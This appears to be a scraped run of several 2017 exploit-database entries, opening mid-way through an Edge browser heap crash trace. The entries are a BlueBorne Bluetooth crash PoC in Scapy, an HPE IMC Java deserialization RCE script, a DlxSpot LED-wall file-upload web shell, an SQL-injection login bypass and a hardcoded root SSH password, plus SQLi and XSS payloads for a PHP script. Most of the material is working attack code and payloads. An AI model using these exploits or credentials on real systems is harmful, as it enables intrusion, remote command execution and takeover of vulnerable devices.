in busy allocation ( DPH_HEAP_BLOCK: UserAddr UserSize - VirtAddr VirtSize)
1b652a5fd68: 1b652742fe0 20 - 1b652742000 2000
00007ffae783fd99 ntdll!RtlDebugAllocateHeap+0x000000000003bf65
00007ffae782db7c ntdll!RtlpAllocateHeap+0x0000000000083fbc
00007ffae77a8097 ntdll!RtlpAllocateHeapInternal+0x0000000000000727
00007ffac9958547 edgehtml!`TextInput::TextInputLogging::Instance'::`2'::`dynamic atexit destructor for 'wrapper''+0x0000000000010457
00007ffac96d1483 edgehtml!CImplAry::EnsureSizeWorker+0x0000000000000093
00007ffac9882261 edgehtml!CImplPtrAry::Append+0x0000000000000051
00007ffac9589543 edgehtml!CSelectElement::AppendOption+0x000000000000002f
00007ffac95892e1 edgehtml!CSelectElement::BuildOptionsCache+0x00000000000000e1
00007ffac9e7f044 edgehtml!CSelectElement::Morph+0x00000000000000d0
00007ffac9a4e7cf edgehtml!`TextInput::TextInputLogging::Instance'::`2'::`dynamic atexit destructor for 'wrapper''+0x00000000001066df
00007ffac9605f85 edgehtml!SetNumberPropertyHelper<long,CSetIntegerPropertyHelper>+0x0000000000000255
00007ffac9605d23 edgehtml!NUMPROPPARAMS::SetNumberProperty+0x000000000000003b
00007ffac9605bda edgehtml!CBase::put_BoolHelper+0x000000000000004a
00007ffac9c6f1d1 edgehtml!CFastDOM::CHTMLSelectElement::Trampoline_Set_multiple+0x000000000000013d
00007ffac9916b55 edgehtml!CFastDOM::CHTMLSelectElement::Profiler_Set_multiple+0x0000000000000025
00007ffac8ce6d07 chakra!Js::JavascriptExternalFunction::ExternalFunctionThunk+0x0000000000000177
00007ffac8dc2640 chakra!Js::LeaveScriptObject<1,1,0>::LeaveScriptObject<1,1,0>+0x0000000000000180
00007ffac8e62209 chakra!Js::JavascriptOperators::CallSetter+0x00000000000000a9
00007ffac8de7151 chakra!Js::CacheOperators::TrySetProperty<1,1,1,1,1,1,0,1>+0x00000000000002d1
00007ffac8de6ce6 chakra!Js::ProfilingHelpers::ProfiledStFld<0>+0x00000000000000d6
00007ffac8d89a70 chakra!Js::InterpreterStackFrame::OP_ProfiledSetProperty<Js::OpLayoutT_ElementCP<Js::LayoutSizePolicy<0> > const >+0x0000000000000070
00007ffac8d8e800 chakra!Js::InterpreterStackFrame::ProcessProfiled+0x0000000000000340
00007ffac8d8c852 chakra!Js::InterpreterStackFrame::Process+0x0000000000000142
00007ffac8d90920 chakra!Js::InterpreterStackFrame::InterpreterHelper+0x00000000000004a0
00007ffac8d92065 chakra!Js::InterpreterStackFrame::InterpreterThunk+0x0000000000000055
000001b64f600fb2 +0x000001b64f600fb2
=========================================
-->
# Exploit Title: BlueBorne - Proof of Concept - Unarmed/Unweaponized -
DoS (Crash) only
# Date: 09/21/2017
# Exploit Author: Marcin Kozlowski <marcinguy@gmail.com>
# Version: Kernel version v3.3-rc1, and thus affects all version from there on
# Tested on: Linux 4.4.0-93-generic #116
# CVE : CVE-2017-1000251
# Provided for legal security research and testing purposes ONLY.
Proof of Concept - Crash Only - Unarmed/Unweaponized/No Payload
After reading tons of Documentation and Protocol specifications.
1) Install Scapy
https://github.com/secdev/scapy
Add/Replace these requests and responses in Bluetooth Protocol stack to these:
scapy/layers/bluetooth.py
class L2CAP_ConfReq(Packet):
name = "L2CAP Conf Req"
fields_desc = [ LEShortField("dcid",0),
LEShortField("flags",0),
ByteField("type",0),
ByteField("length",0),
ByteField("identifier",0),
ByteField("servicetype",0),
LEShortField("sdusize",0),
LEIntField("sduarrtime",0),
LEIntField("accesslat",0),
LEIntField("flushtime",0),
]
class L2CAP_ConfResp(Packet):
name = "L2CAP Conf Resp"
fields_desc = [ LEShortField("scid",0),
LEShortField("flags",0),
LEShortField("result",0),
ByteField("type0",0),
ByteField("length0",0),
LEShortField("option0",0),
ByteField("type1",0),
ByteField("length1",0),
LEShortField("option1",0),
ByteField("type2",0),
ByteField("length2",0),
LEShortField("option2",0),
ByteField("type3",0),
ByteField("length3",0),
LEShortField("option3",0),
ByteField("type4",0),
ByteField("length4",0),
LEShortField("option4",0),
ByteField("type5",0),
ByteField("length5",0),
LEShortField("option5",0),
ByteField("type6",0),
ByteField("length6",0),
LEShortField("option6",0),
ByteField("type7",0),
ByteField("length7",0),
LEShortField("option7",0),
ByteField("type8",0),
ByteField("length8",0),
LEShortField("option8",0),
ByteField("type9",0),
ByteField("length9",0),
LEShortField("option9",0),
ByteField("type10",0),
ByteField("length10",0),
LEShortField("option10",0),
ByteField("type11",0),
ByteField("length11",0),
LEShortField("option11",0),
ByteField("type12",0),
ByteField("length12",0),
LEShortField("option12",0),
ByteField("type13",0),
ByteField("length13",0),
LEShortField("option13",0),
ByteField("type14",0),
ByteField("length14",0),
LEShortField("option14",0),
ByteField("type15",0),
ByteField("length15",0),
LEShortField("option15",0),
ByteField("type16",0),
ByteField("length16",0),
LEShortField("option16",0),
ByteField("type17",0),
ByteField("length17",0),
LEShortField("option17",0),
ByteField("type18",0),
ByteField("length18",0),
LEShortField("option18",0),
ByteField("type19",0),
ByteField("length19",0),
LEShortField("option19",0),
ByteField("type20",0),
ByteField("length20",0),
LEShortField("option20",0),
ByteField("type21",0),
ByteField("length21",0),
LEShortField("option21",0),
ByteField("type22",0),
ByteField("length22",0),
LEShortField("option22",0),
ByteField("type23",0),
ByteField("length23",0),
LEShortField("option23",0),
ByteField("type24",0),
ByteField("length24",0),
LEShortField("option24",0),
ByteField("type25",0),
ByteField("length25",0),
LEShortField("option25",0),
ByteField("type26",0),
ByteField("length26",0),
LEShortField("option26",0),
ByteField("type27",0),
ByteField("length27",0),
LEShortField("option27",0),
ByteField("type28",0),
ByteField("length28",0),
LEShortField("option28",0),
ByteField("type29",0),
ByteField("length29",0),
LEShortField("option29",0),
ByteField("type30",0),
ByteField("length30",0),
LEShortField("option30",0),
ByteField("type31",0),
ByteField("length31",0),
LEShortField("option31",0),
ByteField("type32",0),
ByteField("length32",0),
LEShortField("option32",0),
ByteField("type33",0),
ByteField("length33",0),
LEShortField("option33",0),
ByteField("type34",0),
ByteField("length34",0),
LEShortField("option34",0),
ByteField("type35",0),
ByteField("length35",0),
LEShortField("option35",0),
ByteField("type36",0),
ByteField("length36",0),
LEShortField("option36",0),
ByteField("type37",0),
ByteField("length37",0),
LEShortField("option37",0),
ByteField("type38",0),
ByteField("length38",0),
LEShortField("option38",0),
ByteField("type39",0),
ByteField("length39",0),
LEShortField("option39",0),
ByteField("type40",0),
ByteField("length40",0),
LEShortField("option40",0),
ByteField("type41",0),
ByteField("length41",0),
LEShortField("option41",0),
ByteField("type42",0),
ByteField("length42",0),
LEShortField("option42",0),
ByteField("type43",0),
ByteField("length43",0),
LEShortField("option43",0),
ByteField("type44",0),
ByteField("length44",0),
LEShortField("option44",0),
ByteField("type45",0),
ByteField("length45",0),
LEShortField("option45",0),
ByteField("type46",0),
ByteField("length46",0),
LEShortField("option46",0),
ByteField("type47",0),
ByteField("length47",0),
LEShortField("option47",0),
ByteField("type48",0),
ByteField("length48",0),
LEShortField("option48",0),
ByteField("type49",0),
ByteField("length49",0),
LEShortField("option49",0),
ByteField("type50",0),
ByteField("length50",0),
LEShortField("option50",0),
ByteField("type51",0),
ByteField("length51",0),
LEShortField("option51",0),
ByteField("type52",0),
ByteField("length52",0),
LEShortField("option52",0),
ByteField("type53",0),
ByteField("length53",0),
LEShortField("option53",0),
ByteField("type54",0),
ByteField("length54",0),
LEShortField("option54",0),
ByteField("type55",0),
ByteField("length55",0),
LEShortField("option55",0),
ByteField("type56",0),
ByteField("length56",0),
LEShortField("option56",0),
ByteField("type57",0),
ByteField("length57",0),
LEShortField("option57",0),
ByteField("type58",0),
ByteField("length58",0),
LEShortField("option58",0),
ByteField("type59",0),
ByteField("length59",0),
LEShortField("option59",0),
ByteField("type60",0),
ByteField("length60",0),
LEShortField("option60",0),
ByteField("type61",0),
ByteField("length61",0),
LEShortField("option61",0),
ByteField("type62",0),
ByteField("length62",0),
LEShortField("option62",0),
ByteField("type63",0),
ByteField("length63",0),
LEShortField("option63",0),
ByteField("type64",0),
ByteField("length64",0),
LEShortField("option64",0),
ByteField("type65",0),
ByteField("length65",0),
LEShortField("option65",0),
ByteField("type66",0),
ByteField("length66",0),
LEShortField("option66",0),
ByteField("type67",0),
ByteField("length67",0),
LEShortField("option67",0),
ByteField("type68",0),
ByteField("length68",0),
LEShortField("option68",0),
ByteField("type69",0),
ByteField("length69",0),
LEShortField("option69",0),
]
2) Exploit
bluebornexploit.py
------------------------
from scapy.all import *
pkt = L2CAP_CmdHdr(code=4)/
L2CAP_ConfReq(type=0x06,length=16,identifier=1,servicetype=0x0,sdusize=0xffff,sduarrtime=0xffffffff,accesslat=0xffffffff,flushtime=0xffffffff)
pkt1 = L2CAP_CmdHdr(code=5)/
L2CAP_ConfResp(result=0x04,type0=1,length0=2,option0=2000,type1=1,length1=2,option1=2000,type2=1,length2=2,option2=2000,type3=1,length3=2,option3=2000,type4=1,length4=2,option4=2000,type5=1,length5=2,option5=2000,type6=1,length6=2,option6=2000,type7=1,length7=2,option7=2000,type8=1,length8=2,option8=2000,type9=1,length9=2,option9=2000,type10=1,length10=2,option10=2000,type11=1,length11=2,option11=2000,type12=1,length12=2,option12=2000,type13=1,length13=2,option13=2000,type14=1,length14=2,option14=2000,type15=1,length15=2,option15=2000,type16=1,length16=2,option16=2000,type17=1,length17=2,option17=2000,type18=1,length18=2,option18=2000,type19=1,length19=2,option19=2000,type20=1,length20=2,option20=2000,type21=1,length21=2,option21=2000,type22=1,length22=2,option22=2000,type23=1,length23=2,option23=2000,type24=1,length24=2,option24=2000,type25=1,length25=2,option25=2000,type26=1,length26=2,option26=2000,type27=1,length27=2,option27=2000,type28=1,length28=2,option28=2000,type29=1,length29=2,option29=2000,type30=1,length30=2,option30=2000,type31=1,length31=2,option31=2000,type32=1,length32=2,option32=2000,type33=1,length33=2,option33=2000,type34=1,length34=2,option34=2000,type35=1,length35=2,option35=2000,type36=1,length36=2,option36=2000,type37=1,length37=2,option37=2000,type38=1,length38=2,option38=2000,type39=1,length39=2,option39=2000,type40=1,length40=2,option40=2000,type41=1,length41=2,option41=2000,type42=1,length42=2,option42=2000,type43=1,length43=2,option43=2000,type44=1,length44=2,option44=2000,type45=1,length45=2,option45=2000,type46=1,length46=2,option46=2000,type47=1,length47=2,option47=2000,type48=1,length48=2,option48=2000,type49=1,length49=2,option49=2000,type50=1,length50=2,option50=2000,type51=1,length51=2,option51=2000,type52=1,length52=2,option52=2000,type53=1,length53=2,option53=2000,type54=1,length54=2,option54=2000,type55=1,length55=2,option55=2000,type56=1,length56=2,option56=2000,type57=1,length57=2,option57=2000,type58=1,length58=2,option58=2000,type59=1,length59=2,option59=2000,type60=1,length60=2,option60=2000,type61=1,length61=2,option61=2000,type62=1,length62=2,option62=2000,type63=1,length63=2,option63=2000,type64=1,length64=2,option64=2000,type65=1,length65=2,option65=2000,type66=1,length66=2,option66=2000,type67=1,length67=2,option67=2000,type68=1,length68=2,option68=2000,type69=1,length69=2,option69=2000)
bt = BluetoothL2CAPSocket("00:1A:7D:DA:71:13")
bt.send(pkt)
bt.send(pkt1)
bluetoothsrv.py
--------------------
from scapy.all import *
bt = BluetoothL2CAPSocket("01:02:03:04:05:06")
bt.recv()
DEMO:
https://imgur.com/a/zcvLb
#!/usr/bin/env python
########################################################################################################
#
# HPE/H3C IMC - Java Deserialization Exploit
#
# Version 0.1
# Tested on Windows Server 2008 R2
# Name HPE/H3C IMC (Intelligent Management Center) Java 1.8.0_91
#
# Author:
# Raphael Kuhn (Daimler TSS)
#
# Special thanks to:
# Jan Esslinger (@H_ng_an) for the websphere exploit this one is based upon
#
#######################################################################################################
import requests
import sys
import os
import os.path
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
host = "127.0.0.1:8080"
payload_file = "payload.bin"
body = ""
def printUsage () :
print "......................................................................................................................"
print "."
print ". HPE/H3C - IMC Java Deserialization Exploit"
print "."
print ". Example 1: -payload-binary"
print ". [-] Usage: %s http[s]://<IP>:<PORT> -payload-binary payload" % sys.argv[0]
print ". [-] Example: %s https://127.0.0.1:8880 -payload-binary ysoserial_payload.bin" % sys.argv[0]
print ". 1. Create payload with ysoserial.jar (https://github.com/frohoff/ysoserial/releases) "
print ". java -jar ysoserial.jar CommonsCollections3 'cmd.exe /c ping -n 1 53.48.79.183' > ysoserial_payload.bin"
print ". 2. Send request to server"
print ". %s https://127.0.0.1:8880 -payload-binary ysoserial_payload.bin" % sys.argv[0]
print "."
print ". Example 2: -payload-string"
print '. [-] Usage: %s http[s]://<IP>:<PORT> -payload-string "payload"' % sys.argv[0]
print '. [-] Example: %s https://127.0.0.1:8880 -payload-string "cmd.exe /c ping -n 1 53.48.79.183"' % sys.argv[0]
print ". 1. Send request to server with payload as string (need ysoserial.jar in the same folder)"
print '. %s https://127.0.0.1:8880 -payload-string "cmd.exe /c ping -n 1 53.48.79.183"' % sys.argv[0]
print "."
print "......................................................................................................................"
def loadPayloadFile (_fileName) :
print "[+] Load payload file %s" % _fileName
payloadFile = open(_fileName, 'rb')
payloadFile_read = payloadFile.read()
return payloadFile_read
def exploit (_payload) :
url = sys.argv[1]
url += "/imc/topo/WebDMServlet"
print "[+] Sending exploit to %s" % (url)
data = _payload
response = requests.post(url, data=data, verify=False)
return response
#def showResponse(_response):
# r = response
# m = r.search(_response)
# if (m.find("java.lang.NullPointerException")):
# print "[+] Found java.lang.NullPointerException, exploit finished successfully (hopefully)"
# else:
# print "[-] ClassCastException not found, exploit failed"
if __name__ == "__main__":
if len(sys.argv) < 4:
printUsage()
sys.exit(0)
else:
print "------------------------------------------"
print "- HPE/H3C - IMC Java Deserialization Exploit -"
print "------------------------------------------"
host = sys.argv[1]
print "[*] Connecting to %s" %host
if sys.argv[2] == "-payload-binary":
payload_file = sys.argv[3]
if os.path.isfile(payload_file):
payload = loadPayloadFile(payload_file)
response = exploit(payload)
showResponse(response.content)
else:
print "[-] Can't load payload file"
elif sys.argv[2] == "-payload-string":
if os.path.isfile("ysoserial.jar"):
sPayload = sys.argv[3]
sPayload = "java -jar ysoserial.jar CommonsCollections5 '" +sPayload+ "' > payload.bin"
print "[+] Create payload file (%s) " %sPayload
os.system(sPayload)
payload = loadPayloadFile(payload_file)
response = exploit(payload)
print "[+] Response received, exploit finished."
else:
print "[-] Can't load ysoserial.jar"
else:
printUsage()
# Exploit Title: DlxSpot - Player4 LED video wall - Arbitrary File Upload
to RCE
# Google Dork: "DlxSpot - Player4"
# Date: 2017-05-14
# Discoverer: Simon Brannstrom
# Authors Website: https://unknownpwn.github.io/
# Vendor Homepage: http://www.tecnovision.com/
# Software Link: n/a
# Version: >1.5.10
# Tested on: Linux
# About: DlxSpot is the software controlling Tecnovision LED Video Walls
all over the world, they are used in football arenas, concert halls,
shopping malls, as roadsigns etc.
# CVE: CVE-2017-12929
# Linked CVE's: CVE-2017-12928, CVE-2017-12930.
# Visit my github page at
https://github.com/unknownpwn/unknownpwn.github.io/blob/master/README.md
for complete takeover of the box, from SQLi to root access.
###############################################################################################################################
Arbitrary File Upload leading to Remote Command Execution:
1. Visit http://host/resource.php and upload PHP shell. For example: <?php
system($_GET["c"]); ?>
2. RCE via http://host/resource/source/shell.php?c=id
3. Output: www-data
TIMELINE:
2017-05-14 - Discovery of vulnerabilities.
2017-05-15 - Contacted Tecnovision through contact form on manufacturer
homepage.
2017-06-01 - No response, tried contacting again through several contact
forms on homepage.
2017-08-10 - Contacted Common Vulnerabilities and Exposures (CVE)
requesting CVE assignment.
2017-08-17 - Three CVE's assigned for the vulnerabilities found.
2017-08-22 - With help from fellow hacker and friend, byt3bl33d3r, sent an
email in Italian to the company.
2017-09-18 - No response, full public disclosure.
DEDICATED TO MARCUS ASTROM
FOREVER LOVED - NEVER FORGOTTEN
# Exploit Title: Foodspotting Clone v1.0 - SQL Injection/Reflected XSS
# Date: 2017-09-13
# Exploit Author: 8bitsec
# Vendor Homepage: http://www.phpscriptsmall.com/
# Software Link: http://www.phpscriptsmall.com/product/foodspotting-clone/
# Version: 1.0
# Tested on: [Kali Linux 2.0 | Mac OS 10.12.6]
# Email: contact@8bitsec.io
# Contact: https://twitter.com/_8bitsec
Release Date:
=============
2017-09-13
Product & Service Introduction:
===============================
Foodspotting Clone allows you to initiate your very own social networking website that similar appearance as Foodspotting and additional food lover websites.
Technical Details & Description:
================================
Reflected XSS/SQL injection on [resid] parameter.
Proof of Concept (PoC):
=======================
SQLi:
http://localhost/[path]/restaurant-menu.php?resid=' AND SLEEP(5) AND 'nhSH'='nhSH
Parameter: resid (GET)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: resid=' AND SLEEP(5) AND 'nhSH'='nhSH
Type: UNION query
Title: Generic UNION query (NULL) - 14 columns
Payload: resid=' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7176627a71,0x435a72445467737074496d6e5a7855726f6e534c4b6469705774427550576c70676d425361626642,0x71767a6271),NULL,NULL,NULL-- aIwp
Reflected XSS:
http://localhost/[path]/restaurant-menu.php?resid=/"><svg/onload=alert(/8bitsec/)>
==================
8bitsec - [https://twitter.com/_8bitsec]
# Exploit Title: DlxSpot - Player4 LED video wall - Admin Interface SQL
Injection
# Google Dork: "DlxSpot - Player4"
# Date: 2017-05-14
# Discoverer: Simon Brannstrom
# Authors Website: https://unknownpwn.github.io/
# Vendor Homepage: http://www.tecnovision.com/
# Software Link: n/a
# Version: >1.5.10
# Tested on: Linux
# About: DlxSpot is the software controlling Tecnovision LED Video Walls
all over the world, they are used in football arenas, concert halls,
shopping malls, as roadsigns etc.
# CVE: CVE-2017-12930
# Linked CVE's: CVE-2017-12928, CVE-2017-12929
# Visit my github page at
https://github.com/unknownpwn/unknownpwn.github.io/blob/master/README.md
for complete takeover of the box, from SQLi to full root access.
###############################################################################################################################
DlxSpot Player 4 above version 1.5.10 suffers from an SQL injection
vulnerability in the admin interface login and is exploitable the following
way:
username:admin
password:x' or 'x'='x
TIMELINE:
2017-05-14 - Discovery of vulnerabilities.
2017-05-15 - Contacted Tecnovision through contact form on manufacturer
homepage.
2017-06-01 - No response, tried contacting again through several contact
forms on homepage.
2017-08-10 - Contacted Common Vulnerabilities and Exposures (CVE)
requesting CVE assignment.
2017-08-17 - Three CVE's assigned for the vulnerabilities found.
2017-08-22 - With help from fellow hacker and friend, byt3bl33d3r, sent an
email in Italian to the company.
2017-09-18 - No response, full public disclosure.
DEDICATED TO MARCUS ASTROM
FOREVER LOVED - NEVER FORGOTTEN
# Exploit Title: DlxSpot - Player4 LED video wall - Hardcoded Root SSH Password.
# Google Dork: "DlxSpot - Player4"
# Date: 2017-05-14
# Discoverer: Simon Brannstrom
# Authors Website: https://unknownpwn.github.io/
# Vendor Homepage: http://www.tecnovision.com/
# Software Link: n/a
# Version: All known versions
# Tested on: Linux
# About: DlxSpot is the software controlling Tecnovision LED Video Walls all over the world, they are used in football arenas, concert halls, shopping malls, as roadsigns etc.
# CVE: CVE-2017-12928
# Linked CVE's: CVE-2017-12929, CVE-2017-12930
# Visit my github page at https://github.com/unknownpwn/unknownpwn.github.io/blob/master/README.md for complete takeover of the box, from SQLi to root access.
###############################################################################################################################
Hardcoded password for all dlxspot players, login with the following credentials via SSH
username: dlxuser
password: tecn0visi0n
Escalate to root with the same password.
TIMELINE:
2017-05-14 - Discovery of vulnerabilities.
2017-05-15 - Contacted Tecnovision through contact form on manufacturer homepage.
2017-06-01 - No response, tried contacting again through several contact forms on homepage.
2017-08-10 - Contacted Common Vulnerabilities and Exposures (CVE) requesting CVE assignment.
2017-08-17 - Three CVE's assigned for the vulnerabilities found.
2017-08-22 - With help from fellow hacker and friend, byt3bl33d3r, sent an email in Italian to the company.
2017-09-18 - No response, full public disclosure.
DEDICATED TO MARCUS ASTROM
FOREVER LOVED - NEVER FORGOTTEN